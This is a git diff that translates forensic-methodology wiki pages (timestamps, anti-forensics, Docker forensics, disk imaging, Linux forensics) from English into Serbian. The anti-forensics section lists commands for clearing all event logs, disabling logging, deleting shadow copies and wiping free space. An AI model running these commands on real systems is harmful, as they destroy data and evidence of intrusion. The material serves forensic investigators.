-## Deep inspection of specific file-types and Software
+## Dubinska Inspekcija Specifičnih Tipova Datoteka i Softvera
 
-If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
-Read the following page to learn some interesting tricks:
+Ako imate vrlo **sumnjivu** **datoteku**, onda **u zavisnosti od tipa datoteke i softvera** koji je kreirao, nekoliko **trikova** može biti korisno.\
+Pročitajte sledeću stranicu da biste saznali neke zanimljive trikove:
 
 {{#ref}}
 specific-software-file-type-tricks/
 {{#endref}}
 
-I want to do a special mention to the page:
+Želim da posebno pomenem stranicu:
 
 {{#ref}}
 specific-software-file-type-tricks/browser-artifacts.md
 {{#endref}}
 
-## Memory Dump Inspection
+## Inspekcija Dump-a Memorije
 
 {{#ref}}
 memory-dump-analysis/
 {{#endref}}
 
-## Pcap Inspection
+## Inspekcija Pcap-a
 
 {{#ref}}
 pcap-inspection/
 {{#endref}}
 
-## **Anti-Forensic Techniques**
+## **Anti-Forenzičke Tehnike**
 
-Keep in mind the possible use of anti-forensic techniques:
+Imajte na umu moguću upotrebu anti-forenzičkih tehnika:
 
 {{#ref}}
 anti-forensic-techniques.md
 {{#endref}}
 
-## Threat Hunting
+## Lov na Pretnje
 
 {{#ref}}
 file-integrity-monitoring.md
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
index 94a381b98..3af40d29d 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
@@ -4,72 +4,72 @@
 
 ## Timestamps
 
-An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
-It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` \_\_ and \_\_ `$FILE_NAME`.
+Napadač može biti zainteresovan za **promenu vremenskih oznaka datoteka** kako bi izbegao otkrivanje.\
+Moguće je pronaći vremenske oznake unutar MFT u atributima `$STANDARD_INFORMATION` \_\_ i \_\_ `$FILE_NAME`.
 
-Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB).
+Oba atributa imaju 4 vremenske oznake: **Modifikacija**, **pristup**, **kreiranje** i **modifikacija MFT registra** (MACE ili MACB).
 
-**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.
+**Windows explorer** i drugi alati prikazuju informacije iz **`$STANDARD_INFORMATION`**.
 
 ### TimeStomp - Anti-forensic Tool
 
-This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.
+Ovaj alat **modifikuje** informacije o vremenskim oznakama unutar **`$STANDARD_INFORMATION`** **ali** **ne** informacije unutar **`$FILE_NAME`**. Stoga, moguće je **identifikovati** **sumnjivu** **aktivnost**.
 
 ### Usnjrnl
 
-The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes.
+**USN Journal** (Dnevnik broja ažuriranja) je funkcija NTFS (Windows NT datotečni sistem) koja prati promene na volumenu. Alat [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) omogućava ispitivanje ovih promena.
 
 ![](<../../images/image (801).png>)
 
-The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
+Prethodna slika je **izlaz** prikazan od strane **alata** gde se može primetiti da su neke **promene izvršene** na datoteci.
 
 ### $LogFile
 
-**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes.
+**Sve promene metapodataka na datotečnom sistemu se beleže** u procesu poznatom kao [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Beleženi metapodaci se čuvaju u datoteci nazvanoj `**$LogFile**`, koja se nalazi u korenskom direktorijumu NTFS datotečnog sistema. Alati kao što su [LogFileParser](https://github.com/jschicht/LogFileParser) mogu se koristiti za analizu ove datoteke i identifikaciju promena.
 
 ![](<../../images/image (137).png>)
 
-Again, in the output of the tool it's possible to see that **some changes were performed**.
+Ponovo, u izlazu alata moguće je videti da su **neke promene izvršene**.
 
-Using the same tool it's possible to identify to **which time the timestamps were modified**:
+Korišćenjem istog alata moguće je identifikovati **kada su vremenske oznake modifikovane**:
 
 ![](<../../images/image (1089).png>)
 
-- CTIME: File's creation time
-- ATIME: File's modification time
-- MTIME: File's MFT registry modification
-- RTIME: File's access time
+- CTIME: Vreme kreiranja datoteke
+- ATIME: Vreme modifikacije datoteke
+- MTIME: Modifikacija MFT registra datoteke
+- RTIME: Vreme pristupa datoteci
 
-### `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
+### `$STANDARD_INFORMATION` i `$FILE_NAME` poređenje
 
-Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**.
+Još jedan način da se identifikuju sumnjivo modifikovane datoteke bio bi da se uporede vremena na oba atributa tražeći **neusklađenosti**.
 
-### Nanoseconds
+### Nanosekunde
 
-**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
+**NTFS** vremenske oznake imaju **preciznost** od **100 nanosekundi**. Stoga, pronalaženje datoteka sa vremenskim oznakama poput 2010-10-10 10:10:**00.000:0000 je veoma sumnjivo**.
 
 ### SetMace - Anti-forensic Tool
 
-This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information.
+Ovaj alat može modifikovati oba atributa `$STARNDAR_INFORMATION` i `$FILE_NAME`. Međutim, od Windows Vista, potrebno je da živi OS modifikuje ove informacije.
 
 ## Data Hiding
 
-NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**.
+NFTS koristi klaster i minimalnu veličinu informacija. To znači da ako datoteka koristi i klaster i pola, **preostalo polovina nikada neće biti korišćena** dok se datoteka ne obriše. Tada je moguće **sakriti podatke u ovom slobodnom prostoru**.
 
-There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added:
+Postoje alati poput slacker koji omogućavaju skrivanje podataka u ovom "skrivenom" prostoru. Međutim, analiza `$logfile` i `$usnjrnl` može pokazati da su neki podaci dodati:
 
 ![](<../../images/image (1060).png>)
 
-Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted.
+Tada je moguće povratiti slobodan prostor koristeći alate poput FTK Imager. Imajte na umu da ovaj tip alata može sačuvati sadržaj obfuskovan ili čak enkriptovan.
 
 ## UsbKill
 
-This is a tool that will **turn off the computer if any change in the USB** ports is detected.\
-A way to discover this would be to inspect the running processes and **review each python script running**.
+Ovo je alat koji će **isključiti računar ako se otkrije bilo kakva promena na USB** portovima.\
+Jedan od načina da se to otkrije bio bi da se ispita pokrenuti procesi i **pregleda svaki python skript koji se izvršava**.
 
 ## Live Linux Distributions
 
-These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
+Ove distribucije se **izvršavaju unutar RAM** memorije. Jedini način da ih otkrijete je **ako je NTFS datotečni sistem montiran sa pravima za pisanje**. Ako je montiran samo sa pravima za čitanje, neće biti moguće otkriti upad.
 
 ## Secure Deletion
 
@@ -77,74 +77,74 @@ These distros are **executed inside the RAM** memory. The only way to detect the
 
 ## Windows Configuration
 
-It's possible to disable several windows logging methods to make the forensics investigation much harder.
+Moguće je onemogućiti nekoliko metoda beleženja u Windows-u kako bi se forenzička istraga učinila mnogo težom.
 
 ### Disable Timestamps - UserAssist
 
-This is a registry key that maintains dates and hours when each executable was run by the user.
+Ovo je ključ registra koji održava datume i sate kada je svaki izvršni program pokrenut od strane korisnika.
 
-Disabling UserAssist requires two steps:
+Onemogućavanje UserAssist zahteva dva koraka:
 
-1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
-2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`.
+1. Postavite dva ključa registra, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` i `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, oba na nulu kako bi se signalizovalo da želimo da onemogućimo UserAssist.
+2. Očistite svoje podključeve registra koji izgledaju kao `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`.
 
 ### Disable Timestamps - Prefetch
 
-This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.
+Ovo će sačuvati informacije o aplikacijama koje su izvršene sa ciljem poboljšanja performansi Windows sistema. Međutim, ovo može biti korisno i za forenzičke prakse.
 
-- Execute `regedit`
-- Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
-- Right-click on both `EnablePrefetcher` and `EnableSuperfetch`
-- Select Modify on each of these to change the value from 1 (or 3) to 0
-- Restart
+- Izvršite `regedit`
+- Izaberite putanju datoteke `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
+- Desni klik na `EnablePrefetcher` i `EnableSuperfetch`
+- Izaberite Izmeni na svakom od ovih da promenite vrednost sa 1 (ili 3) na 0
+- Ponovo pokrenite
 
 ### Disable Timestamps - Last Access Time
 
-Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.
+Kad god se folder otvori sa NTFS volumena na Windows NT serveru, sistem uzima vreme da **ažurira polje vremenske oznake na svakom navedenom folderu**, koje se naziva vreme poslednjeg pristupa. Na NTFS volumenu koji se često koristi, ovo može uticati na performanse.
 
-1. Open the Registry Editor (Regedit.exe).
-2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
-3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process.
-4. Close the Registry Editor, and reboot the server.
+1. Otvorite Registry Editor (Regedit.exe).
+2. Pretražite do `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
+3. Potražite `NtfsDisableLastAccessUpdate`. Ako ne postoji, dodajte ovaj DWORD i postavite njegovu vrednost na 1, što će onemogućiti proces.
+4. Zatvorite Registry Editor i ponovo pokrenite server.
 
 ### Delete USB History
 
-All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
-You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) to be sure you have deleted them (and to delete them).
+Sve **USB Device Entries** se čuvaju u Windows Registry pod **USBSTOR** ključem registra koji sadrži podključeve koji se kreiraju svaki put kada priključite USB uređaj u svoj PC ili laptop. Možete pronaći ovaj ključ ovde H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Brisanjem ovog** obrišete USB istoriju.\
+Takođe možete koristiti alat [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) da biste bili sigurni da ste ih obrisali (i da ih obrišete).
 
-Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
+Još jedna datoteka koja čuva informacije o USB-ima je datoteka `setupapi.dev.log` unutar `C:\Windows\INF`. Ova datoteka takođe treba da bude obrisana.
 
 ### Disable Shadow Copies
 
-**List** shadow copies with `vssadmin list shadowstorage`\
-**Delete** them running `vssadmin delete shadow`
+**List** shadow copies sa `vssadmin list shadowstorage`\
+**Delete** ih pokretanjem `vssadmin delete shadow`
 
-You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
+Takođe ih možete obrisati putem GUI prateći korake predložene u [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
 
-To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
+Da biste onemogućili shadow copies [koraci odavde](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
 
-1. Open the Services program by typing "services" into the text search box after clicking the Windows start button.
-2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking.
-3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK.
+1. Otvorite program Services tako što ćete otkucati "services" u tekstualnom pretraživaču nakon što kliknete na Windows dugme za pokretanje.
+2. Sa liste, pronađite "Volume Shadow Copy", izaberite ga, a zatim pristupite Svojstvima desnim klikom.
+3. Izaberite Onemogućeno iz padajućeg menija "Startup type", a zatim potvrdite promenu klikom na Primeni i U redu.
 
-It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
+Takođe je moguće modifikovati konfiguraciju koje datoteke će biti kopirane u shadow copy u registru `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
 
 ### Overwrite deleted files
 
-- You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
-- You can also use tools like [**Eraser**](https://eraser.heidi.ie)
+- Možete koristiti **Windows alat**: `cipher /w:C` Ovo će označiti cipher da ukloni sve podatke iz dostupnog neiskorišćenog prostora na disku unutar C drajva.
+- Takođe možete koristiti alate poput [**Eraser**](https://eraser.heidi.ie)
 
 ### Delete Windows event logs
 
-- Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
+- Windows + R --> eventvwr.msc --> Proširite "Windows Logs" --> Desni klik na svaku kategoriju i izaberite "Clear Log"
 - `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
 - `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
 
 ### Disable Windows event logs
 
 - `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
-- Inside the services section disable the service "Windows Event Log"
-- `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
+- Unutar sekcije servisa onemogućite servis "Windows Event Log"
+- `WEvtUtil.exec clear-log` ili `WEvtUtil.exe cl`
 
 ### Disable $UsnJrnl
 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md
index 629251985..7bd820d6b 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md
@@ -2,24 +2,16 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 ## Container modification
 
-There are suspicions that some docker container was compromised:
-
+Postoje sumnje da je neki docker kontejner bio kompromitovan:
 ```bash
 docker ps
 CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
 cc03e43a052a        lamp-wordpress      "./run.sh"          2 minutes ago       Up 2 minutes        80/tcp              wordpress
 ```
-
-You can easily **find the modifications done to this container with regards to the image** with:
-
+Možete lako **pronaći izmene koje su izvršene na ovom kontejneru u vezi sa slikom** pomoću:
 ```bash
 docker diff wordpress
 C /var
@@ -33,70 +25,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
 A /var/lib/mysql/mysql/general_log.CSV
 ...
 ```
-
-In the previous command **C** means **Changed** and **A,** **Added**.\
-If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with:
-
+U prethodnoj komandi **C** znači **Promenjeno** a **A** znači **Dodato**.\
+Ako otkrijete da je neki zanimljiv fajl kao što je `/etc/shadow` izmenjen, možete ga preuzeti iz kontejnera da proverite za malicioznu aktivnost sa:
 ```bash
 docker cp wordpress:/etc/shadow.
 ```
-
-You can also **compare it with the original one** running a new container and extracting the file from it:
-
+Možete takođe **uporediti sa originalom** pokretanjem novog kontejnera i ekstrakcijom datoteke iz njega:
 ```bash
 docker run -d lamp-wordpress
 docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
 diff original_shadow shadow
 ```
-
-If you find that **some suspicious file was added** you can access the container and check it:
-
+Ako otkrijete da je **neki sumnjiv fajl dodat**, možete pristupiti kontejneru i proveriti ga:
 ```bash
 docker exec -it wordpress bash
 ```
+## Izmene slika
 
-## Images modifications
-
-When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
-
+Kada dobijete eksportovanu docker sliku (verovatno u `.tar` formatu), možete koristiti [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) da **izvučete sažetak izmena**:
 ```bash
 docker save  > image.tar #Export the image to a .tar file
 container-diff analyze -t sizelayer image.tar
 container-diff analyze -t history image.tar
 container-diff analyze -t metadata image.tar
 ```
-
-Then, you can **decompress** the image and **access the blobs** to search for suspicious files you may have found in the changes history:
-
+Zatim možete **dekompresovati** sliku i **pristupiti blobovima** da biste pretražili sumnjive datoteke koje ste možda pronašli u istoriji promena:
 ```bash
 tar -xf image.tar
 ```
+### Osnovna Analiza
 
-### Basic Analysis
-
-You can get **basic information** from the image running:
-
+Možete dobiti **osnovne informacije** iz slike pokretanjem:
 ```bash
 docker inspect 
 ```
-
-You can also get a summary **history of changes** with:
-
+Možete takođe dobiti sažetak **istorije promena** sa:
 ```bash
 docker history --no-trunc 
 ```
-
-You can also generate a **dockerfile from an image** with:
-
+Možete takođe generisati **dockerfile iz slike** sa:
 ```bash
 alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
 dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
 ```
-
 ### Dive
 
-In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
-
+Da biste pronašli dodate/izmenjene datoteke u docker slikama, možete koristiti [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alata:
 ```bash
 #First you need to load the image in your docker repo
 sudo docker load < image.tar                                                                                                                                                                                                         1 ⨯
@@ -105,27 +79,19 @@ Loaded image: flask:latest
 #And then open it with dive:
 sudo dive flask:latest
 ```
+Ovo vam omogućava da **navigirate kroz različite blobove docker slika** i proverite koji su fajlovi modifikovani/dodati. **Crvena** označava dodato, a **žuta** označava modifikovano. Koristite **tab** za prelazak na drugi prikaz i **space** za skupljanje/otvaranje foldera.
 
-This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders.
-
-With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\
-You can decompress all the layers from an image from the directory where the image was decompressed executing:
-
+Sa die nećete moći da pristupite sadržaju različitih faza slike. Da biste to uradili, moraćete da **dekompresujete svaki sloj i pristupite mu**.\
+Možete dekompresovati sve slojeve iz slike iz direktorijuma gde je slika dekompresovana izvršavanjem:
 ```bash
 tar -xf image.tar
 for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
 ```
+## Kredencijali iz memorije
 
-## Credentials from memory
+Napomena da kada pokrenete docker kontejner unutar hosta **možete videti procese koji se izvršavaju na kontejneru iz hosta** jednostavno pokretanjem `ps -ef`
 
-Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
+Stoga (kao root) možete **izvršiti dump memorije procesa** sa hosta i pretražiti za **kredencijalima** baš [**kao u sledećem primeru**](../../linux-hardening/privilege-escalation/#process-memory).
 
-Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory).
-
-

-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md
index 214b917cf..a0839a5a1 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md
@@ -1,25 +1,25 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Baseline
+# Osnovna linija
 
-A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**.
+Osnovna linija se sastoji od pravljenja snimka određenih delova sistema kako bi se **uporedila sa budućim statusom radi isticanja promena**.
 
-For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\
-This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
+Na primer, možete izračunati i sačuvati hash svake datoteke u datotečnom sistemu kako biste mogli da saznate koje su datoteke modifikovane.\
+To se takođe može uraditi sa korisničkim nalozima koji su kreirani, procesima koji se izvršavaju, servisima koji se izvršavaju i bilo čim drugim što ne bi trebalo da se mnogo menja, ili uopšte.
 
-## File Integrity Monitoring
+## Praćenje integriteta datoteka
 
-File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps:
+Praćenje integriteta datoteka (FIM) je kritična bezbednosna tehnika koja štiti IT okruženja i podatke praćenjem promena u datotekama. Uključuje dva ključna koraka:
 
-1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications.
-2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions.
+1. **Uporedna analiza osnovne linije:** Uspostavite osnovnu liniju koristeći atribute datoteka ili kriptografske heš vrednosti (kao što su MD5 ili SHA-2) za buduće upoređivanje radi otkrivanja modifikacija.
+2. **Obaveštenje o promenama u realnom vremenu:** Dobijajte trenutna obaveštenja kada se datoteke pristupaju ili menjaju, obično putem ekstenzija jezgra OS-a.
 
-## Tools
+## Alati
 
 - [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
 - [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
 
-## References
+## Reference
 
 - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
index a95a3bbff..e999d0154 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
@@ -1,40 +1,30 @@
-# Image Acquisition & Mount
+# Akvizicija slika & Montaža
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

 
-{% embed url="https://websec.nl/" %}
-
-## Acquisition
+## Akvizicija
 
 ### DD
-
 ```bash
 #This will generate a raw copy of the disk
 dd if=/dev/sdb of=disk.img
 ```
-
 ### dcfldd
-
 ```bash
 #Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)
 dcfldd if= of= bs=512 hash= hashwindow= hashlog=
 dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
 ```
-
 ### FTK Imager
 
-You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
-
+Možete [**preuzeti FTK imager отсyд**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
 ```bash
 ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
 ```
-
 ### EWF
 
-You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf).
-
+Možete generisati sliku diska koristeći [**ewf tools**](https://github.com/libyal/libewf).
 ```bash
 ewfacquire /dev/sdb
 #Name: evidence
@@ -51,15 +41,13 @@ ewfacquire /dev/sdb
 #Then use default values
 #It will generate the disk image in the current directory
 ```
+## Montiranje
 
-## Mount
+### Nekoliko tipova
 
-### Several types
-
-In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**.
+U **Windows** možete pokušati da koristite besplatnu verziju Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) da **montirate forenzičku sliku**.
 
 ### Raw
-
 ```bash
 #Get file type
 file evidence.img
@@ -68,9 +56,7 @@ evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b
 #Mount it
 mount evidence.img /mnt
 ```
-
 ### EWF
-
 ```bash
 #Get file type
 file evidence.E01
@@ -85,16 +71,14 @@ output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be
 #Mount
 mount output/ewf1 -o ro,norecovery /mnt
 ```
-
 ### ArsenalImageMounter
 
-It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
+To je Windows aplikacija za montiranje volumena. Možete je preuzeti ovde [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
 
-### Errors
-
-- **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`**
-- **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector:
+### Greške
 
+- **`cannot mount /dev/loop0 read-only`** u ovom slučaju treba da koristite oznake **`-o ro,norecovery`**
+- **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** u ovom slučaju montiranje je neuspešno jer je pomeraj datotečnog sistema drugačiji od onog na slici diska. Treba da pronađete veličinu sektora i početni sektor:
 ```bash
 fdisk -l disk.img
 Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
@@ -107,15 +91,8 @@ Disk identifier: 0x00495395
 Device        Boot Start    End Sectors  Size Id Type
 disk.img1       2048 208895  206848  101M  1 FAT12
 ```
-
-Note that sector size is **512** and start is **2048**. Then mount the image like this:
-
+Napomena da je veličina sektora **512** i da je početak **2048**. Zatim montirajte sliku ovako:
 ```bash
 mount disk.img /mnt -o ro,offset=$((2048*512))
 ```
-
-

-
-{% embed url="https://websec.nl/" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
index 568da19c5..34f536637 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
@@ -1,28 +1,17 @@
 # Linux Forensics
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
-
 {{#include ../../banners/hacktricks-training.md}}
 
-## Initial Information Gathering
+## Prikupljanje Početnih Informacija
 
-### Basic Information
-
-First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries:
+### Osnovne Informacije
 
+Prvo, preporučuje se da imate neki **USB** sa **dobro poznatim binarnim datotekama i bibliotekama** (možete jednostavno preuzeti ubuntu i kopirati foldere _/bin_, _/sbin_, _/lib,_ i _/lib64_), zatim montirajte USB i modifikujte env varijable da koristite te binarne datoteke:
 ```bash
 export PATH=/mnt/usb/bin:/mnt/usb/sbin
 export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
 ```
-
